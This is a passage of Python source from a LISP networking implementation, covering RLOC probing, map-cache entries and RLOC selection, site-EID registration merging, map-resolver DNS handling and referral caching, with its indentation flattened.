def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from the first RLOC, the one that active
# RLOC-probing is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl/60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take uptime modulo TTL; refresh the entry only when the remainder is
# within the first couple of seconds of a TTL period, so a refresh
# happens roughly once per TTL.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. Refresh the entry once 90% of the TTL has
# already passed.
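# For example (illustrative numbers): with a 1-hour TTL the entry is
# treated as refreshable once 3240 seconds (90% of 3600) have elapsed.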
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply that will never arrive.
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put each RLOC in lisp.lisp_rloc_probe_list if it isn't already there.
# And if an RLOC was removed from the best list, remove its references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
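# The folded hash indexes into best_rloc_set, so packets of the same
# flow stick to one RLOC while different flows are spread across the
# equal-priority up RLOCs.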
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
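# The inner loop sets 'rloc' to None when a match is found; if it ends
# with 'rloc' still bound to the last candidate address, that entry was
# not matched and the sets differ.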
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
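# For example (hypothetical values), group "224.1.1.1" checked against a
# configured group-prefix of 224.0.0.0/4 returns 4.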
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
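# The most-specific (longest mask) matching group mapping wins; None is
# returned when no configured group-prefix covers the address.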
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endfor
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is an RLOC-name for
# the RLE, clear it from the merged registration. We want names to be
# per RLE entry and not per RLOC-record entry they reside in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special-case details on
# longest-match lookups for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If this is a pull-based LISP-Decent DNS suffix, create a lisp_mr() for
# each additional A-record. Only the master entry (A-record index 0)
# does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
